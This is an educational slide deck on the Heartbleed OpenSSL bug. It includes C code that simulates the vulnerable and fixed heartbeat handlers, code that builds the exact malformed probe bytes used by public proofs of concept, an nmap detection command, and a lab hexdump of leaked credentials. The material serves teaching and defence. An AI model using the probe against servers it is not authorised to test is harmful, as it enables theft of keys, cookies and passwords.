The Heartbleed Bug A vulnerability in the OpenSSL Cryptographic Library.


1 The Heartbleed Bug A vulnerability in the OpenSSL Cryptographic Library

2 Agenda
- General overview of the vulnerability
- Process
- Heartbleed history
- Affected sites
- Exploitation of a vulnerable version of an Apache server
- In the news…

3 Description of the vulnerability
Vulnerable source files: t1_lib.c and d1_both.c; the affected functions are tls1_process_heartbeat() (TLS) and dtls1_process_heartbeat() (DTLS).
The actual breach: memcpy(bp, pl, payload)
bp – final destination of the data to be copied (the heartbeat response being built);
pl – the location of the data to be copied (the payload of the heartbeat request that was received);
payload – the amount of data to copy, read straight from the 16-bit length field of the attacker's message and never compared with the length of the record that actually arrived.
If the attacker claims a larger payload than was sent, memcpy keeps reading past the request into whatever the heap holds next to it. There is no such thing as empty memory!
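The following C program is an added example, not code from the presentation or from OpenSSL itself. It reproduces the control flow of tls1_process_heartbeat() before and after the fix and runs both against the same oversized request. The server heap is a constructed arena, the secret placed behind the request is constructed to mirror the slide-10 dump, and the 1024/16-byte sizes are chosen to keep the over-read inside the arena so the program is deterministic; the real bug reads up to 64 KiB into unrelated memory.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
/* Heartbeat message (RFC 6520): type(1) | payload_length(2) | payload | padding(>=16). */
#define TLS1_HB_REQUEST  1
#define TLS1_HB_RESPONSE 2
#define HB_PADDING       16

/* Constructed stand-in for the server heap: the received record sits at the start of the
 * arena; a secret from an earlier request (constructed, mirrors slide 10) sits 512 bytes in. */
static unsigned char arena[4096];
static unsigned char response[3 + 65535 + HB_PADDING];
static const char SECRET[] = "user=Erin&pass=password1";

/* Request whose length field claims claimed_len bytes but carries actual_len. Returns true length. */
static size_t build_heartbeat(unsigned char *rec, uint16_t claimed_len, size_t actual_len)
{
    rec[0] = TLS1_HB_REQUEST;
    rec[1] = (unsigned char)(claimed_len >> 8);   /* attacker-controlled */
    rec[2] = (unsigned char)(claimed_len & 0xff);
    memset(rec + 3, 'A', actual_len);
    memset(rec + 3 + actual_len, 0, HB_PADDING);
    return 3 + actual_len + HB_PADDING;
}

/* Shared tail of both handlers: echo `payload` bytes starting at pl. */
static size_t write_response(unsigned char *resp, const unsigned char *pl, unsigned int payload)
{
    unsigned char *bp = resp;
    *bp++ = TLS1_HB_RESPONSE;
    *bp++ = (unsigned char)(payload >> 8);
    *bp++ = (unsigned char)(payload & 0xff);
    memcpy(bp, pl, payload);            /* the memcpy(bp, pl, payload) from slide 3 */
    bp += payload;
    memset(bp, 0, HB_PADDING);          /* OpenSSL fills this with random bytes */
    return (size_t)(bp + HB_PADDING - resp);
}

/* Mirrors tls1_process_heartbeat() in OpenSSL 1.0.1f: payload is taken from the message and
 * the real record length (s->s3->rrec.length) is never consulted. */
static int vulnerable_process_heartbeat(const unsigned char *rec, size_t rec_len, unsigned char *resp, size_t *resp_len)
{
    unsigned char hbtype = rec[0];
    unsigned int payload = (unsigned int)(rec[1] << 8 | rec[2]);   /* n2s(p, payload) */
    (void)rec_len;                                                 /* the bug: never checked */
    if (hbtype != TLS1_HB_REQUEST) return 0;
    *resp_len = write_response(resp, rec + 3, payload);            /* over-read of up to 64 KiB */
    return 1;
}

/* The 1.0.1g fix: the header must fit, then the claimed payload must fit; otherwise the
 * message is discarded silently, as RFC 6520 section 4 requires. */
static int fixed_process_heartbeat(const unsigned char *rec, size_t rec_len, unsigned char *resp, size_t *resp_len)
{
    if (1 + 2 + HB_PADDING > rec_len) return 0;
    unsigned char hbtype = rec[0];
    unsigned int payload = (unsigned int)(rec[1] << 8 | rec[2]);
    if (1 + 2 + payload + HB_PADDING > rec_len) return 0;
    if (hbtype != TLS1_HB_REQUEST) return 0;
    *resp_len = write_response(resp, rec + 3, payload);
    return 1;
}

/* Stage the attack: the request claims 1024 bytes but sends 16; the secret lies at offset 512. */
static size_t stage_attack(void)
{
    memset(arena, 0, sizeof arena);
    memcpy(arena + 512, SECRET, sizeof SECRET - 1);
    return build_heartbeat(arena, 1024, 16);
}

/* 1 if the unpatched handler copies the neighbouring secret into the response. The echo starts
 * at arena+3 and lands at response+3, so arena byte i becomes response byte i: offset 512. */
int vulnerable_leaks_secret(void)
{
    size_t rec_len = stage_attack(), resp_len = 0;
    return vulnerable_process_heartbeat(arena, rec_len, response, &resp_len)
        && resp_len == 3 + 1024 + HB_PADDING
        && memcmp(response + 512, SECRET, sizeof SECRET - 1) == 0;
}

/* 1 if the patched handler drops the same request without producing a response. */
int fixed_discards_oversized(void)
{
    size_t rec_len = stage_attack(), resp_len = 0;
    return fixed_process_heartbeat(arena, rec_len, response, &resp_len) == 0 && resp_len == 0;
}

/* 1 if the patched handler still answers a well-formed 16-byte heartbeat. */
int fixed_answers_honest_request(void)
{
    memset(arena, 0, sizeof arena);
    size_t rec_len = build_heartbeat(arena, 16, 16), resp_len = 0;
    return fixed_process_heartbeat(arena, rec_len, response, &resp_len) == 1
        && resp_len == 3 + 16 + HB_PADDING && response[0] == TLS1_HB_RESPONSE;
}

int main(void)
{
    printf("unpatched handler leaks the secret: %d\n", vulnerable_leaks_secret());
    printf("patched handler discards the probe: %d\n", fixed_discards_oversized());
    printf("patched handler answers honest one: %d\n", fixed_answers_honest_request());
    return 0;
}
```

Note that the fix is two comparisons against the length the record layer actually delivered; nothing else about the handler changes, and an honest heartbeat is still answered. The first check (header plus minimum padding) matters on its own: without it a 1- or 2-byte message would make the length read itself run off the end of the record.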

4 Process
The attacker can grab up to 64 KB of memory per heartbeat (the payload length is a 16-bit field, so at most 65535 bytes). Not limited to 1 grab! Each repeated request returns a fresh slice of whatever the server currently has in memory next to the request buffer.
Common Vulnerabilities and Exposures reference: CVE-2014-0160 is the official reference to this bug.
Exploit → Read memory → Extract sensitive information

5 History
Dates back to 2011: Robin Seggelmann, Ph.D. student at the University of Duisburg-Essen, implemented the Heartbeat Extension for OpenSSL.
Introduced in the source code repository on December 31, 2011.
Was adopted with the release of OpenSSL version 1.0.1 on March 14, 2012; heartbeat support was enabled by default.
The bug was discovered on the 1st of April 2014.
"The SSL/TLS encryption, by design and implementation, is meant to protect the information."

6 … some affected sites

7 Target
Targeted machine: Linux distribution for the ARM architecture on a Raspberry Pi, running an Apache server linked against a vulnerable OpenSSL.
OpenSSL 1.0.1 through 1.0.1f are vulnerable; 1.0.1g fixes the bug, and the 1.0.0 and 0.9.8 branches never contained the heartbeat code.

8 Source
Attack source: Kali Linux distribution for the ARM architecture on a Raspberry Pi.
Detection scan from the attacking machine: nmap -p 443 --script ssl-heartbleed 192.168.0.105

9 Attack
Attack source: to exploit this bug we used a custom mass auditing tool crafted by Rahul Sasi.
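What the scanner on slide 8 and the auditing tool on slide 9 actually put on the wire, as an added C example that is neither the Nmap script nor Sasi's tool: the malformed heartbeat record the public proofs of concept send, and the decision rule applied to the first record that comes back. Networking is left out; a real probe first completes a handshake whose ClientHello advertises the heartbeat extension, waits for ServerHelloDone, and then sends this record in the clear, using the negotiated protocol version rather than the fixed 0x0302 assumed here. The sample responses are constructed, not captured traffic.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* TLS record header: content_type(1) | version(2) | length(2), then the fragment. */
#define TLS_CT_ALERT      0x15
#define TLS_CT_HEARTBEAT  0x18
#define TLS1_HB_REQUEST   1
#define TLS1_HB_RESPONSE  2

enum verdict { NOT_VULNERABLE = 0, VULNERABLE = 1, INCONCLUSIVE = 2 };

/* The probe: one heartbeat record carrying only the 3-byte heartbeat header, whose
 * payload_length field claims `claimed` bytes (0x4000 in the public PoCs) although no payload
 * follows. With version 0x0302 and claimed 0x4000 the bytes are 18 03 02 00 03 01 40 00. */
size_t build_probe(unsigned char *out, size_t cap, uint16_t version, uint16_t claimed)
{
    if (cap < 8) return 0;
    out[0] = TLS_CT_HEARTBEAT;
    out[1] = (unsigned char)(version >> 8);  out[2] = (unsigned char)(version & 0xff);
    out[3] = 0;                              out[4] = 3;   /* record length: header only */
    out[5] = TLS1_HB_REQUEST;
    out[6] = (unsigned char)(claimed >> 8);  out[7] = (unsigned char)(claimed & 0xff);
    return 8;
}

/* Classify the first TLS record that comes back. A patched server discards the malformed
 * request silently (or alerts and closes); a vulnerable one answers with a heartbeat response
 * whose payload is non-empty even though we sent zero payload bytes. */
enum verdict classify_response(const unsigned char *buf, size_t len)
{
    if (len == 0) return NOT_VULNERABLE;                 /* nothing within the timeout */
    if (len < 5) return INCONCLUSIVE;                    /* not even a record header */
    if (buf[0] == TLS_CT_ALERT) return NOT_VULNERABLE;   /* e.g. unexpected_message */
    if (buf[0] != TLS_CT_HEARTBEAT || len < 8) return INCONCLUSIVE;
    if (buf[5] != TLS1_HB_RESPONSE) return INCONCLUSIVE;
    uint16_t rec_len  = (uint16_t)(buf[3] << 8 | buf[4]);
    uint16_t returned = (uint16_t)(buf[6] << 8 | buf[7]);
    return (returned > 0 && rec_len > 3) ? VULNERABLE : NOT_VULNERABLE;
}

/* Constructed responses, not captured traffic. A real reply to a 0x4000 probe spans two
 * records (16384-byte maximum fragment); only the first is needed for the verdict. */
static const unsigned char SAMPLE_VULN[] = {
    0x18, 0x03, 0x02, 0x40, 0x00,               /* heartbeat record, 16384-byte fragment */
    0x02, 0x40, 0x00,                           /* response, payload_length = 0x4000 */
    'u', 's', 'e', 'r', '=', 'E', 'r', 'i', 'n' /* leaked heap bytes (truncated here) */
};
static const unsigned char SAMPLE_ALERT[] = { 0x15, 0x03, 0x02, 0x00, 0x02, 0x02, 0x0a }; /* fatal unexpected_message */

/* 1 if build_probe() emits exactly the byte sequence used by the public PoCs. */
int probe_matches_poc_bytes(void)
{
    static const unsigned char poc[8] = { 0x18, 0x03, 0x02, 0x00, 0x03, 0x01, 0x40, 0x00 };
    unsigned char p[8];
    return build_probe(p, sizeof p, 0x0302, 0x4000) == 8 && memcmp(p, poc, 8) == 0;
}

int main(void)
{
    printf("probe matches PoC bytes: %d\n", probe_matches_poc_bytes());
    printf("leaking reply -> %d (1 = vulnerable)\n", classify_response(SAMPLE_VULN, sizeof SAMPLE_VULN));
    printf("alert reply   -> %d\n", classify_response(SAMPLE_ALERT, sizeof SAMPLE_ALERT));
    printf("no reply      -> %d\n", classify_response(NULL, 0));
    return 0;
}
```

The decisive signal is a heartbeat response at all: the probe carried no payload, so every returned byte came from the server's memory. Treating silence as "not vulnerable" is the same heuristic the scanners use, which is also why an unpatched server behind a device that drops heartbeat records can be reported clean, one reason the slide-12 caveat about unreliable tests exists.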

10 Attack
Attack result (memory returned by the server, hexdump format; the tail of an HTTP POST with credentials in the clear is visible):
0002c0b0 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 |e: application/x|
0002c0c0 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 |-www-form-urlenc|
0002c0d0 6f 64 65 64 0d 0a 0d 0a 75 73 65 72 3d 45 72 69 |oded....user=Eri|
0002c0e0 6e 26 70 61 73 73 3d 70 61 73 73 77 6f 72 64 31 |n&pass=password1|
0002c0f0 4b 3a c2 1e 8c c3 dd 39 b1 e8 de 46 41 c7 98 76 |K:.....9...FA..v|

11 Observations
Heartbeat can appear in different phases of the connection setup…
IDS/IPS rules to detect heartbeat have been developed.
This does not require a MITM attack: any client that can open a TLS connection to the server can send the malformed heartbeat.
The only ways to protect a server are to upgrade to a fixed version of OpenSSL (1.0.1g or later) or to recompile OpenSSL with the heartbeat extension disabled (the OPENSSL_NO_HEARTBEATS build option). Because private keys, session cookies and passwords may already have been read out of memory, the upgrade should be followed by reissuing certificates and rotating the exposed secrets.

12 Am I vulnerable?
Several services have been made available to test whether Heartbleed affects a given site:
- Tenable Network Security wrote a plugin for Nessus
- Qualys added dedicated QIDs and developed SSLTest.com
- The Nmap security scanner includes a Heartbleed detection script (ssl-heartbleed) from version 6.45
- Sourcefire has released Snort rules to detect Heartbleed attack traffic and the possible response
However, many services have been claimed to be ineffective for detecting the bug.

13 …in the news
The Canada Revenue Agency reported the theft of Social Insurance Numbers belonging to 900 taxpayers in 6 hours!
Bloomberg: the NSA knew about this!
Bruce Schneier: "Catastrophic is the right word. On the scale of 1 to 10, this is an 11. Half a million sites are vulnerable, including my own."

14 OpenSSL Response
Theo de Raadt, founder and leader of the OpenBSD and OpenSSH projects: "OpenSSL is not developed by a responsible team."
OpenSSL core developer Ben Laurie: "OpenSSL is not reviewed by enough people."
Software engineer John Walsh: "Think about it, OpenSSL only has two fulltime people to write, maintain, test, and review 500,000 lines of business critical code."

15 OpenSSL Response
OpenSSL Software Foundation president Steve Marquess: "The mystery is not that a few overworked volunteers missed this bug; the mystery is why it hasn't happened more often."
"The fact that the code change which caused the bug was done by an individual working at 23:00 on a New Year's Eve says a lot. The code simply wasn't reviewed enough and it went undetected for two years."

16 Thank you!
There is a higher chance of becoming a victim of online crime than of real-life crime!
